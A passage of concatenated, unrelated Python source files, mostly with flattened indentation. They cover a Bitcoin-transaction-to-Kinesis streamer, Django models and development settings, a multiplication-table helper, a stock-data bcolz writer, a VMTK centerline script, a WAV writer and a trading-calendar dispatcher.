params = parser.parse_args(args)
kinesis = k(params.region)
stream_name = _stream_name(region=params.region, env=params.env)
shard_count = params.shard_count
logging.info('creating stream %s with shard count %d', stream_name, shard_count)
response = kinesis.create_stream(
StreamName=stream_name,
ShardCount=shard_count
)
logging.info('success: created stream %s with shard count %d', stream_name, shard_count)
def stream_incoming_transactions(args=None):
configure_logging()
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser()
    parser.add_argument('--maxsize', type=int, default=300)
    parser.add_argument('--txport', type=int, default=constants.RAW_TX_PORT)
parser.add_argument('--region', required=True)
parser.add_argument('--env', required=True)
parser.add_argument('--host', required=True)
parser.add_argument('--network', default='main', choices=constants.NETWORKS.keys())
args = parser.parse_args(args)
q = Queue.Queue(maxsize=args.maxsize)
def produce(q):
with strongfellowbtc.zmq.socket(port=args.txport, topic='rawtx') as socket:
while True:
topic, tx = socket.recv_multipart()
delta = datetime.now() - datetime(1970, 1, 1)
ms = long(delta.total_seconds() * 1000)
try:
q.put_nowait((ms, tx))
except Queue.Full:
                    logging.exception("Queue is Full: we can't put %s" % strongfellowbtc.hex.little_endian_hex(ds256(tx)))
def consume(q):
kinesis = k(region=args.region)
stream_name = _stream_name(region=args.region, env=args.env)
while True:
if q.empty():
time.sleep(1)
logging.info('no transactions, sleeping for a second')
else:
records = []
n = q.qsize()
                logging.info('%d transactions enqueued', n)
while len(records) < n:
ms, tx = q.get_nowait()
data = msgpack.packb({
't': ms, # milliseconds since epoch
'x': tx, # the transaction
'h': args.host, # short name of the host
'n': args.network # main, testnet, segnet, etc.
})
partition_key = strongfellowbtc.hex.big_endian_hex(ds256(tx))
record = {
'Data': data,
'PartitionKey': partition_key
}
records.append(record)
try:
response = kinesis.put_records(
Records=records,
StreamName=stream_name
)
logging.info('response was: %s', response)
logging.info('SUCCESS putting records')
except:
logging.exception('problem putting records')
time.sleep(3)
t1 = threading.Thread(target=produce, args=(q,))
t2 = threading.Thread(target=consume, args=(q,))
t1.start()
t2.start()
    logging.info("join us, won't you?")
t1.join()
t2.join()
def test_get_records(args = None):
configure_logging()
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser()
parser.add_argument('--region', required=True)
parser.add_argument('--env', required=True)
parser.add_argument('--host', required=True)
params = parser.parse_args(args)
kinesis = k(region=params.region)
stream_name = _stream_name(region=params.region, env=params.env)
shard_id = 'shardId-000000000000'
shard_iterator = kinesis.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType="LATEST")['ShardIterator']
while True:
response = kinesis.get_records(ShardIterator=shard_iterator, Limit=1000)
shard_iterator = response['NextShardIterator']
for record in response['Records']:
d = msgpack.unpackb(record['Data'])
for key in d:
print 'key: %s' % key
print strongfellowbtc.hex.big_endian_hex(ds256(d['x']))
print response
time.sleep(1)
|
# -*- coding: utf-8
from django.apps import AppConfig
class PublishableModelConfig(AppConfig):
name = 'publishable_model'
|
"""
Function that generates multiplication tables
"""
def multiplication_tables_generator(times: int, lower: int, upper: int) -> list:
"""
>>> multiplication_tables_generator(2, 1, 10)
['1 x 2 = 2', '2 x 2 = 4', '3 x 2 = 6', '4 x 2 = 8', '5 x 2 = 10', '6 x 2 = 12', '7 x 2 = 14', '8 x 2 = 16', '9 x 2 = 18', '10 x 2 = 20']
"""
tables = []
    for number in range(lower, upper + 1):
tables.append(f"{number} x {times} = {number * times}")
return tables
if __name__ == "__main__":
import doctest
doctest.testmod()
table = int(input("Enter the Table Number: "))
    miny = int(input("Enter the Minimum Value: "))
    maxy = int(input("Enter the Maximum Value: "))
    for line in multiplication_tables_generator(table, miny, maxy):
        print(line)
|
from datetime import date
from django.contrib.auth.models import User, AbstractUser, UserManager
from django.db import models
from django.utils.translation import gettext_lazy as _
from .validators import validate_born_date
class CustomUserManager(UserManager):
def create_superuser(self, username, email, password, **extra_fields):
extra_fields.setdefault('occupation', 'ADMIN')
        if extra_fields.get('occupation') != 'ADMIN':
raise ValueError('Superuser must have occupation=ADMIN.')
return super().create_superuser(username, email, password, **extra_fields)
class Profile(AbstractUser):
OCCUPATION_TYPE = (
('FAC', _('Functionary of Migratory acts')),
('FUF', _('Functionary of Finance')),
('BDAC', _('Boss of Migratory acts')),
('DIR', _('Director')),
('ADMIN', _('Administrator')),
)
born_date = models.DateField(_('Born date'), blank=True, null=True, validators=[validate_born_date])
occupation = models.CharField(_('Occupation'), max_length=5, choices=OCCUPATION_TYPE, default='FAC')
objects = CustomUserManager()
class Meta:
verbose_name = _('Profile')
verbose_name_plural = _('Profiles')
def age(self):
if self.born_date:
return _('%(years)d years') % {'years': date.today().year - self.born_date.year}
else:
return None
def __str__(self):
if self.first_name and self.last_name:
return self.get_full_name()
else:
return self.username
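# Usage sketch (assumes a Django project configured with AUTH_USER_MODEL
# pointing at this Profile model; names and credentials are made up):
#
#     admin = Profile.objects.create_superuser('root', '[email protected]', 's3cret')
#     # occupation defaults to 'ADMIN'; any other value raises ValueError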
|
def from_h5(item, trajectory_item=None, atom_indices='all', frame_indices='all'):
from molsysmt.forms.api_h5 import to_mdtraj_Topology as h5_to_mdtraj_Topology
from molsysmt.native.io.topology import from_mdtraj_Topology as mdtraj_Topology_to_molsysmt_Topology
tmp_item = h5_to_mdtraj_Topology(item)
tmp_item = mdtraj_Topology_to_molsysmt_Topology(tmp_item)
return tmp_item
|
"""
Dynamic information
"""
import json
import os
import re
from functools import partial
from shutil import rmtree
import numpy as np
import pandas as pd
from logbook import Logger
from odo import odo
from cswd.common.utils import data_root, ensure_list
from cswd.sql.constants import MARGIN_MAPS
from .base import STOCK_DB, bcolz_table_path
from .utils import _normalize_ad_ts_sid
LABEL_MAPS = {'日期': 'asof_date', '股票代码': 'sid'}
DYNAMIC_TABLES = ['adjustments', 'margins', 'special_treatments', 'short_names']
logger = Logger('dynamic data')
def normalized_dividend_data(df):
"""每股现金股利"""
raw_df = df[['股票代码', '日期', '派息']].copy()
raw_df.rename(columns=LABEL_MAPS, inplace=True)
raw_df.rename(columns={'派息': 'amount'}, inplace=True)
    # the as-of date is one day before the payout date
raw_df['asof_date'] = pd.to_datetime(raw_df['asof_date']) - pd.Timedelta(days=1)
return raw_df
def normalized_margins_data(df):
"""融资融券数据"""
df.drop(['更新时间', '序号'], axis=1, inplace=True)
df.rename(columns=LABEL_MAPS, inplace=True)
df.rename(columns={v: k for k, v in MARGIN_MAPS.items()}, inplace=True)
return df
# TODO: simplify by using daily-bar data instead
def normalized_short_names_data(df):
"""股票简称数据"""
    # stocks not yet listed (or newly listed) have no stock code yet
df = df[~df['股票代码'].isna()].copy()
df.drop(['更新时间', '序号', '备注说明'], axis=1, inplace=True)
df.rename(columns=LABEL_MAPS, inplace=True)
df.rename(columns={'股票简称': 'short_name'}, inplace=True)
    # originally the effective date; shift the as-of date back one day
df['asof_date'] = df['asof_date'] - pd.Timedelta(days=1)
return df
# TODO: stock short name -> conversion
def normalized_special_treatments_data(df):
"""特殊处理历史"""
    # stocks not yet listed (or newly listed) have no stock code yet
df = df[~df['股票代码'].isna()]
df = df[['股票代码', '日期', '特别处理']].copy()
df.rename(columns=LABEL_MAPS, inplace=True)
df.rename(columns={'特别处理': 'treatment'}, inplace=True)
    # originally the effective date; shift the as-of date back one day
df['asof_date'] = df['asof_date'] - pd.Timedelta(days=1)
return df
def _factory(table_name):
if table_name == 'adjustments':
return normalized_dividend_data
elif table_name == 'short_names':
return normalized_short_names_data
elif table_name == 'special_treatments':
return normalized_special_treatments_data
elif table_name == 'margins':
return normalized_margins_data
raise NotImplementedError(table_name)
def _write_by_expr(expr, ndays=0):
"""
    Write the expression data in bcolz format.

    Conversion steps:
    1. Read the table data and convert it to a pd.DataFrame
"""
table_name = expr._name
    # tidy up the data table
    # 1. read the table
df = odo(expr, pd.DataFrame)
    # 2. adjust and transform the data
processed = _factory(table_name)(df)
    # 3. normalize column names and types
out = _normalize_ad_ts_sid(processed, ndays)
    # convert to bcolz format and store
rootdir = bcolz_table_path(table_name)
if os.path.exists(rootdir):
rmtree(rootdir)
odo(out, rootdir)
    logger.info('table: {}, data stored at: {}'.format(table_name, rootdir))
def write_dynamic_data_to_bcolz(tables=None):
"""
    Store daily change data in bcolz format to speed up dataset loading.
"""
if not tables:
to_does = DYNAMIC_TABLES
else:
        to_does = ensure_list(tables)
for table in to_does:
if table in DYNAMIC_TABLES:
ndays = 0
            logger.info('preprocessing table: {}'.format(table))
expr = STOCK_DB[table]
_write_by_expr(expr, ndays)
else:
            raise ValueError('table "{}" to be written is not one of "{}"'.format(
                table, DYNAMIC_TABLES))
|
version_info = (2, 8, 0)
__version__ = ".".join([str(v) for v in version_info])
|
from sys import maxsize
class User:
def __init__(self, firstname=None, lastname=None, address1=None, postcode=None, city=None, email=None, phone=None, password=None, id=None):
self.firstname = firstname
self.lastname = lastname
self.address1 = address1
self.postcode = postcode
self.city = city
self.email = email
self.phone = phone
        self.password = password
self.id = id
def __repr__(self):
return "%s:%s:%s" % (self.id, self.firstname, self.lastname)
def __eq__(self, other):
        return (self.id is None or other.id is None or self.id == other.id) and \
            self.firstname == other.firstname and self.lastname == other.lastname
def id_or_max(self):
if self.id:
return int(self.id)
else:
            return maxsize
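# Sorting sketch: id_or_max makes users without an id sort last (it falls
# back to sys.maxsize):
#
#     users = [User(id="3"), User(id=None), User(id="1")]
#     users.sort(key=User.id_or_max)   # order: id "1", id "3", then id None
|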
#!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkcenterlinemerge.py,v $
## Language: Python
## Date: $Date: 2005/09/14 09:49:59 $
## Version: $Revision: 1.4 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY
import vtk
import sys
from vmtk import pypes
from vmtk import vtkvmtk
class vmtkCenterlineMerge(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Centerlines = None
self.RadiusArrayName = 'MaximumInscribedSphereRadius'
self.GroupIdsArrayName = 'GroupIds'
self.CenterlineIdsArrayName = 'CenterlineIds'
self.TractIdsArrayName = 'TractIds'
self.BlankingArrayName = 'Blanking'
self.Length = 0.0
self.MergeBlanked = 1
self.SetScriptName('vmtkcenterlinemerge')
self.SetScriptDoc('merge centerline tracts belonging to the same groups')
self.SetInputMembers([
['Centerlines','i','vtkPolyData',1,'','the input centerlines','vmtksurfacereader'],
['RadiusArrayName','radiusarray','str',1,'','name of the array where centerline radius is stored'],
['GroupIdsArrayName','groupidsarray','str',1,'','name of the array where centerline group ids are stored'],
['CenterlineIdsArrayName','centerlineidsarray','str',1,'','name of the array where centerline ids are stored'],
['TractIdsArrayName','tractidsarray','str',1,'','name of the array where centerline tract ids are stored'],
['BlankingArrayName','blankingarray','str',1,'','name of the array where centerline blanking information about branches is stored'],
['Length','length','float',1,'(0.0,)','length of the resampling interval'],
['MergeBlanked','mergeblanked','bool',1,'','toggle generation of segments for blanked groups']
])
self.SetOutputMembers([
['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter']
])
def Execute(self):
        if self.Centerlines is None:
self.PrintError('Error: No input centerlines.')
mergeCenterlines = vtkvmtk.vtkvmtkMergeCenterlines()
mergeCenterlines.SetInputData(self.Centerlines)
mergeCenterlines.SetRadiusArrayName(self.RadiusArrayName)
mergeCenterlines.SetGroupIdsArrayName(self.GroupIdsArrayName)
mergeCenterlines.SetCenterlineIdsArrayName(self.CenterlineIdsArrayName)
mergeCenterlines.SetTractIdsArrayName(self.TractIdsArrayName)
mergeCenterlines.SetBlankingArrayName(self.BlankingArrayName)
mergeCenterlines.SetResamplingStepLength(self.Length)
mergeCenterlines.SetMergeBlanked(self.MergeBlanked)
mergeCenterlines.Update()
self.Centerlines = mergeCenterlines.GetOutput()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
|
import math
import wave
import struct
# https://stackoverflow.com/questions/33879523/python-how-can-i-generate-a-wav-file-with-beeps
import librosa
import matplotlib.pyplot as plt
import librosa.display
'''
# sr == sampling rate
x, sr = librosa.load("tensorsong.wav", sr=44100)
# stft is short time fourier transform
X = librosa.stft(x,hop_length=1024,n_fft=2048) #overlap #431 - 2047 -> #nfft is number of samples per fft
# convert the slices to amplitude
Xdb = librosa.amplitude_to_db(abs(X))
# ... and plot, magic!
plt.figure(figsize=(14, 5))
Xdb[:500] = 0
print(Xdb.shape)
librosa.display.specshow(Xdb, sr = sr, x_axis = 'time', y_axis = 'hz')
plt.colorbar()
plt.show()
'''
def save_wav(file_name, audio_tensor, nchannels=1):
    # Open up a wav file
    wav_file = wave.open(file_name, "w")
    # wav params
sampwidth = 2
sample_rate = 44100.0
# 44100 is the industry standard sample rate - CD quality. If you need to
    # save on file size you can adjust it downwards. The standard for low quality
# is 8000 or 8kHz.
nframes = max(audio_tensor.shape) #len(audio_tensor)
comptype = "NONE"
compname = "not compressed"
wav_file.setparams((nchannels, sampwidth, sample_rate, nframes, comptype, compname))
# WAV files here are using short, 16 bit, signed integers for the
# sample size. So we multiply the floating point data we have by 32767, the
    # maximum value for a short integer. NOTE: It is theoretically possible to
# use the floating point -1.0 to 1.0 data directly in a WAV file but not
# obvious how to do that using the wave module in python.
if nchannels == 1: # mono sound
for sample in audio_tensor:
sample = sample[0]
wav_file.writeframes(struct.pack('h', int( sample * 32767.0 )))
if nchannels == 2: # stereo sound
for sample in audio_tensor:
for stereo in sample: # 1 left ear, 1 right ear iteratively
wav_file.writeframes(struct.pack('h', int(stereo * 32767.0 )))
wav_file.close()
|
from __future__ import absolute_import
from __future__ import unicode_literals
from identify import identify
UNKNOWN = 'unknown'
IGNORED_TAGS = frozenset((
identify.DIRECTORY, identify.SYMLINK, identify.FILE,
identify.EXECUTABLE, identify.NON_EXECUTABLE,
identify.TEXT, identify.BINARY,
))
ALL_TAGS = frozenset((identify.ALL_TAGS - IGNORED_TAGS) | {UNKNOWN})
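# Example sketch (exact tags depend on the installed identify version):
#
#     identify.tags_from_filename('setup.py') & ALL_TAGS   # e.g. {'python'}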
|
import logging.config
import sys
from .base import * # NOQA
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES[0]['OPTIONS'].update({'debug': True})
TIME_ZONE = 'UTC'
STATIC_ROOT = str(ROOT_DIR.path('staticfiles'))
STATIC_URL = '/staticfiles/'
FAVICON_PATH = STATIC_URL + 'dist/webapp/app/extras/favicon.ico'
STATICFILES_DIRS = (
('dist', os.path.join(STATIC_ROOT, 'dist')),
)
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': 'redis://localhost:6379',
'KEY_PREFIX': 'default',
'OPTIONS': {
'DB': 0,
'PARSER_CLASS': 'redis.connection.HiredisParser',
'CONNECTION_POOL_CLASS': 'redis.BlockingConnectionPool',
'CONNECTION_POOL_CLASS_KWARGS': {
'max_connections': 50,
'timeout': 20,
},
# 'MAX_CONNECTIONS': 1000,
'PICKLE_VERSION': -1, # Latest
}
}
}
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if "celery" in sys.argv[0]:
DEBUG = False
# Debug Toolbar (http://django-debug-toolbar.readthedocs.org/)
INSTALLED_APPS += ('debug_toolbar',)
DEBUG_TOOLBAR_PATCH_SETTINGS = False
MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ]
INTERNAL_IPS = ('127.0.0.1', '192.168.99.100',)
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.cache.CachePanel',
# 'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
DEBUG_TOOLBAR_CONFIG = {
'JQUERY_URL': '',
}
# By default (for development), show emails to console in DEBUG mode
#EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
#EMAIL_BACKEND = 'django_ses.SESBackend'
print('EMAIL_BACKEND = {0}'.format(EMAIL_BACKEND))
CORS_ORIGIN_WHITELIST += ('http://localhost:3000',)
# Kinesis Firehose:
# -----------------
USE_FIREHOSE = False
# Dynamodb Usage
# --------------
USE_DYNAMODB_WORKERLOG_DB = True
USE_DYNAMODB_FILTERLOG_DB = True
USE_WORKER = False
# SNS notifications are disabled for development
ENABLE_STAFF_SNS_NOTIFICATIONS = False
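# Cache usage sketch (requires the Redis instance configured above at
# localhost:6379):
#
#     from django.core.cache import cache
#     cache.set('greeting', 'hello', timeout=60)
#     cache.get('greeting')   # -> 'hello'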
|
import itertools as it
import datetime as dt
from dateutil import relativedelta as rd
from trading_calendars import trading_calendar as tc
from trading_calendars.errors import (
CalendarNameCollision,
CyclicCalendarAlias,
InvalidCalendarName
)
from trading_calendars.always_open import AlwaysOpenCalendar
from trading_calendars.exchange_calendar_asex import ASEXExchangeCalendar
from trading_calendars.exchange_calendar_bvmf import BVMFExchangeCalendar
from trading_calendars.exchange_calendar_cmes import CMESExchangeCalendar
from trading_calendars.exchange_calendar_iepa import IEPAExchangeCalendar
from trading_calendars.exchange_calendar_xams import XAMSExchangeCalendar
from trading_calendars.exchange_calendar_xasx import XASXExchangeCalendar
from trading_calendars.exchange_calendar_xbkk import XBKKExchangeCalendar
from trading_calendars.exchange_calendar_xbog import XBOGExchangeCalendar
from trading_calendars.exchange_calendar_xbom import XBOMExchangeCalendar
from trading_calendars.exchange_calendar_xbru import XBRUExchangeCalendar
from trading_calendars.exchange_calendar_xbud import XBUDExchangeCalendar
from trading_calendars.exchange_calendar_xbue import XBUEExchangeCalendar
from trading_calendars.exchange_calendar_xcbf import XCBFExchangeCalendar
from trading_calendars.exchange_calendar_xcse import XCSEExchangeCalendar
from trading_calendars.exchange_calendar_xdub import XDUBExchangeCalendar
from trading_calendars.exchange_calendar_xfra import XFRAExchangeCalendar
from trading_calendars.exchange_calendar_xhel import XHELExchangeCalendar
from trading_calendars.exchange_calendar_xhkg import XHKGExchangeCalendar
from trading_calendars.exchange_calendar_xice import XICEExchangeCalendar
from trading_calendars.exchange_calendar_xidx import XIDXExchangeCalendar
from trading_calendars.exchange_calendar_xist import XISTExchangeCalendar
from trading_calendars.exchange_calendar_xjse import XJSEExchangeCalendar
from trading_calendars.exchange_calendar_xkar import XKARExchangeCalendar
from trading_calendars.exchange_calendar_xkls import XKLSExchangeCalendar
from trading_calendars.exchange_calendar_xkrx import XKRXExchangeCalendar
from trading_calendars.exchange_calendar_xlim import XLIMExchangeCalendar
from trading_calendars.exchange_calendar_xlis import XLISExchangeCalendar
from trading_calendars.exchange_calendar_xlon import XLONExchangeCalendar
from trading_calendars.exchange_calendar_xmad import XMADExchangeCalendar
from trading_calendars.exchange_calendar_xmex import XMEXExchangeCalendar
from trading_calendars.exchange_calendar_xmil import XMILExchangeCalendar
from trading_calendars.exchange_calendar_xmos import XMOSExchangeCalendar
from trading_calendars.exchange_calendar_xnys import XNYSExchangeCalendar
from trading_calendars.exchange_calendar_xnze import XNZEExchangeCalendar
from trading_calendars.exchange_calendar_xosl import XOSLExchangeCalendar
from trading_calendars.exchange_calendar_xpar import XPARExchangeCalendar
from trading_calendars.exchange_calendar_xphs import XPHSExchangeCalendar
from trading_calendars.exchange_calendar_xpra import XPRAExchangeCalendar
from trading_calendars.exchange_calendar_xses import XSESExchangeCalendar
from trading_calendars.exchange_calendar_xsgo import XSGOExchangeCalendar
from trading_calendars.exchange_calendar_xshg import XSHGExchangeCalendar
from trading_calendars.exchange_calendar_xsto import XSTOExchangeCalendar
from trading_calendars.exchange_calendar_xswx import XSWXExchangeCalendar
from trading_calendars.exchange_calendar_xtai import XTAIExchangeCalendar
from trading_calendars.exchange_calendar_xtks import XTKSExchangeCalendar
from trading_calendars.exchange_calendar_xtse import XTSEExchangeCalendar
from trading_calendars.exchange_calendar_xwar import XWARExchangeCalendar
from trading_calendars.exchange_calendar_xwbo import XWBOExchangeCalendar
from trading_calendars.us_futures_calendar import QuantopianUSFuturesCalendar
from trading_calendars.weekday_calendar import WeekdayCalendar
import pandas as pd
from pandas.tseries import holiday, offsets
from pluto.coms.utils import conversions as cvr
from pluto.trading_calendars import wrappers as wr
from protos import calendar_pb2 as cpb
_default_calendar_factories = {
# Exchange calendars.
'ASEX': ASEXExchangeCalendar,
'BVMF': BVMFExchangeCalendar,
'CMES': CMESExchangeCalendar,
'IEPA': IEPAExchangeCalendar,
'XAMS': XAMSExchangeCalendar,
'XASX': XASXExchangeCalendar,
'XBKK': XBKKExchangeCalendar,
'XBOG': XBOGExchangeCalendar,
'XBOM': XBOMExchangeCalendar,
'XBRU': XBRUExchangeCalendar,
'XBUD': XBUDExchangeCalendar,
'XBUE': XBUEExchangeCalendar,
'XCBF': XCBFExchangeCalendar,
'XCSE': XCSEExchangeCalendar,
'XDUB': XDUBExchangeCalendar,
'XFRA': XFRAExchangeCalendar,
'XHEL': XHELExchangeCalendar,
'XHKG': XHKGExchangeCalendar,
'XICE': XICEExchangeCalendar,
'XIDX': XIDXExchangeCalendar,
'XIST': XISTExchangeCalendar,
'XJSE': XJSEExchangeCalendar,
'XKAR': XKARExchangeCalendar,
'XKLS': XKLSExchangeCalendar,
'XKRX': XKRXExchangeCalendar,
'XLIM': XLIMExchangeCalendar,
'XLIS': XLISExchangeCalendar,
'XLON': XLONExchangeCalendar,
'XMAD': XMADExchangeCalendar,
'XMEX': XMEXExchangeCalendar,
'XMIL': XMILExchangeCalendar,
'XMOS': XMOSExchangeCalendar,
'XNYS': XNYSExchangeCalendar,
'XNZE': XNZEExchangeCalendar,
'XOSL': XOSLExchangeCalendar,
'XPAR': XPARExchangeCalendar,
'XPHS': XPHSExchangeCalendar,
'XPRA': XPRAExchangeCalendar,
'XSES': XSESExchangeCalendar,
'XSGO': XSGOExchangeCalendar,
'XSHG': XSHGExchangeCalendar,
'XSTO': XSTOExchangeCalendar,
'XSWX': XSWXExchangeCalendar,
'XTAI': XTAIExchangeCalendar,
'XTKS': XTKSExchangeCalendar,
'XTSE': XTSEExchangeCalendar,
'XWAR': XWARExchangeCalendar,
'XWBO': XWBOExchangeCalendar,
# Miscellaneous calendars.
'us_futures': QuantopianUSFuturesCalendar,
'24/7': AlwaysOpenCalendar,
'24/5': WeekdayCalendar,
}
_default_calendar_aliases = {
'AMEX': 'XNYS',
'NYSE': 'XNYS',
'NASDAQ': 'XNYS',
'BATS': 'XNYS',
'FWB': 'XFRA',
'LSE': 'XLON',
'TSX': 'XTSE',
'BMF': 'BVMF',
'CME': 'CMES',
'CBOT': 'CMES',
'COMEX': 'CMES',
'NYMEX': 'CMES',
'ICE': 'IEPA',
'ICEUS': 'IEPA',
'NYFE': 'IEPA',
'CFE': 'XCBF',
'JKT': 'XIDX',
}
class TradingCalendarDispatcher(object):
"""
A class for dispatching and caching trading calendars.
Methods of a global instance of this class are provided by
calendars.calendar_utils.
Parameters
----------
calendars : dict[str -> TradingCalendar]
Initial set of calendars.
calendar_factories : dict[str -> function]
Factories for lazy calendar creation.
aliases : dict[str -> str]
Calendar name aliases.
"""
def __init__(self, calendars, calendar_factories, aliases):
self._calendars = calendars
self._calendar_factories = dict(calendar_factories)
self._aliases = dict(aliases)
def get_calendar(self, name):
"""
        Retrieves an instance of a TradingCalendar whose name is given.
Parameters
----------
name : str
The name of the TradingCalendar to be retrieved.
Returns
-------
calendar : calendars.TradingCalendar
The desired calendar.
"""
canonical_name = self.resolve_alias(name)
try:
return self._calendars[canonical_name]
except KeyError:
# We haven't loaded this calendar yet, so make a new one.
pass
try:
factory = self._calendar_factories[canonical_name]
except KeyError:
# We don't have a factory registered for this name. Barf.
raise InvalidCalendarName(calendar_name=name)
# Cache the calendar for future use.
calendar = self._calendars[canonical_name] = factory()
return calendar
def has_calendar(self, name):
"""
Do we have (or have the ability to make) a calendar with ``name``?
"""
return (
name in self._calendars
or name in self._calendar_factories
or name in self._aliases
)
def register_calendar(self, name, calendar, force=False):
"""
Registers a calendar for retrieval by the get_calendar method.
Parameters
----------
name: str
The key with which to register this calendar.
calendar: TradingCalendar
The calendar to be registered for retrieval.
force : bool, optional
If True, old calendars will be overwritten on a name collision.
If False, name collisions will raise an exception.
Default is False.
Raises
------
CalendarNameCollision
If a calendar is already registered with the given calendar's name.
"""
if force:
self.deregister_calendar(name)
if self.has_calendar(name):
raise CalendarNameCollision(calendar_name=name)
self._calendars[name] = calendar
def register_calendar_type(self, name, calendar_type, force=False):
"""
Registers a calendar by type.
This is useful for registering a new calendar to be lazily instantiated
at some future point in time.
Parameters
----------
name: str
The key with which to register this calendar.
calendar_type: type
The type of the calendar to register.
force : bool, optional
If True, old calendars will be overwritten on a name collision.
If False, name collisions will raise an exception.
Default is False.
Raises
------
CalendarNameCollision
If a calendar is already registered with the given calendar's name.
"""
if force:
self.deregister_calendar(name)
if self.has_calendar(name):
raise CalendarNameCollision(calendar_name=name)
self._calendar_factories[name] = calendar_type
def register_calendar_alias(self, alias, real_name, force=False):
"""
Register an alias for a calendar.
This is useful when multiple exchanges should share a calendar, or when
there are multiple ways to refer to the same exchange.
After calling ``register_alias('alias', 'real_name')``, subsequent
calls to ``get_calendar('alias')`` will return the same result as
``get_calendar('real_name')``.
Parameters
----------
alias : str
The name to be used to refer to a calendar.
real_name : str
The canonical name of the registered calendar.
force : bool, optional
If True, old calendars will be overwritten on a name collision.
If False, name collisions will raise an exception.
Default is False.
"""
if force:
self.deregister_calendar(alias)
if self.has_calendar(alias):
raise CalendarNameCollision(calendar_name=alias)
self._aliases[alias] = real_name
# Ensure that the new alias doesn't create a cycle, and back it out if
# we did.
try:
self.resolve_alias(alias)
except CyclicCalendarAlias:
del self._aliases[alias]
raise
def resolve_alias(self, name):
"""
Resolve a calendar alias for retrieval.
Parameters
----------
name : str
The name of the requested calendar.
Returns
-------
canonical_name : str
The real name of the calendar to create/return.
"""
seen = []
while name in self._aliases:
seen.append(name)
name = self._aliases[name]
# This is O(N ** 2), but if there's an alias chain longer than 2,
# something strange has happened.
if name in seen:
seen.append(name)
raise CyclicCalendarAlias(
cycle=" -> ".join(repr(k) for k in seen)
)
return name
def deregister_calendar(self, name):
"""
If a calendar is registered with the given name, it is de-registered.
Parameters
----------
        name : str
The name of the calendar to be deregistered.
"""
self._calendars.pop(name, None)
self._calendar_factories.pop(name, None)
self._aliases.pop(name, None)
def clear_calendars(self):
"""
        Deregisters all currently registered calendars.
"""
self._calendars.clear()
self._calendar_factories.clear()
self._aliases.clear()
global_calendar_dispatcher = TradingCalendarDispatcher(
calendars={},
calendar_factories=_default_calendar_factories,
aliases=_default_calendar_aliases
)
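# Dispatcher usage sketch: aliases resolve to canonical names, and calendars
# are instantiated lazily on first request.
#
#     global_calendar_dispatcher.resolve_alias('NYSE')        # -> 'XNYS'
#     nyse = global_calendar_dispatcher.get_calendar('NYSE')  # built once, then cached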
_cache = {}
def resolve_alias(name):
return global_calendar_dispatcher.resolve_alias(name)
def get_calendar_in_range(name, start_dt, end_dt=None, cache=False):
"""
Parameters
----------
name: str
start_dt: pandas.Timestamp
end_dt: pandas.Timestamp
Returns
-------
trading_calendars.TradingCalendar
"""
dis = global_calendar_dispatcher
try:
name = dis.resolve_alias(name)
factory = dis._calendar_factories[name]
except KeyError:
# We don't have a factory registered for this name. Barf.
raise InvalidCalendarName(calendar_name=name)
if end_dt is None:
end_dt = start_dt + pd.Timedelta(days=10)
cal = wr.OpenOffsetFix(start_dt, end_dt, factory)
if cache:
        # cache the latest instance
_cache[name] = cal
return cal
def get_calendar(name):
try:
name = global_calendar_dispatcher.resolve_alias(name)
cal = _cache[name]
return cal
except KeyError:
raise RuntimeError("Calendar instance doesn't exist.")
class TradingCalendar(tc.TradingCalendar):
#todo: instead of calling init, we should call __new__
def __init__(self, start, end, proto_calendar):
super(TradingCalendar, self).__init__(start, end)
self._proto_calendar = proto_calendar
self._regular_early_close = self._from_proto_time(proto_calendar.regular_early_close)
    def __new__(cls, start, end, proto_calendar):
        return super(TradingCalendar, cls).__new__(cls)
def _from_proto_time(self, proto_time):
return dt.time(proto_time.hour, proto_time.minute)
def _from_proto_holiday(self, proto_holiday):
offsts = [self._from_proto_offset(offset) for offset in proto_holiday.offsets]
return holiday.Holiday(
proto_holiday.name,
proto_holiday.year,
proto_holiday.month,
proto_holiday.day,
offset=offsts.pop() if len(offsts) == 1 else offsts,
observance=self._from_proto_observance(proto_holiday.observance),
start_date=pd.Timestamp(cvr.to_datetime(proto_holiday.start_date)),
end_date=pd.Timestamp(cvr.to_datetime(proto_holiday.end_date)),
days_of_week=[day for day in proto_holiday.days_of_week]
)
def _from_proto_offset(self, proto_offset):
if proto_offset.type == cpb.Offset.MONDAY:
return pd.DateOffset(weekday=rd.MO(proto_offset.n))
elif proto_offset.type == cpb.Offset.DAY:
return pd.DateOffset(offsets.Day(proto_offset.n))
elif proto_offset.type == cpb.Offset.THURSDAY:
return pd.DateOffset(weekday=rd.TH(proto_offset.n))
elif proto_offset.type == cpb.Offset.EASTER:
return pd.DateOffset(offsets.Easter())
else:
return
def _from_proto_observance(self, proto_observance):
